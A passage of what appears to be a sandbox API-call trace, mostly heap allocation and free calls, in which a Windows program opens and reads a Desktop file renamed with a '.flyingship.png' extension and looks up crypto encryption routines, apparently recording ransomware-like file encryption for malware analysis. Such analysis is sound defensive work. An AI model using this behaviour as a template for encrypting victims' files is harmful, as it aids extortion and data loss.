lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0168.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0168.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0168.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0168.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0168.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0168.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0168.042] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0168.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0168.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vlnsdshtm2x.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0168.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0168.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0168.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0168.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0168.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0168.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0168.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0168.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0168.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0168.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0168.052] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0168.052] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x41a7, lpOverlapped=0x0) returned 1 [0168.054] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0168.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41a7) returned 0x900318 [0168.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0168.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0168.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41a7) returned 0x9e5190 [0168.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900318 | out: hHeap=0x8a0000) returned 1 [0168.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.055] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0168.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0168.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0168.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0168.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41a7) returned 0x900318 [0168.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900318 | out: hHeap=0x8a0000) returned 1 [0168.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0168.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0168.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.056] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0168.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0168.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0168.056] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.056] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0168.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41a7) returned 0x900318 [0168.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0168.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0168.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41a7) returned 0x9e9340 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0168.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0168.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0168.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0168.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0168.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0168.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0168.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0168.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0168.058] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0168.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2808 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0168.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0168.059] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0168.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0168.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | 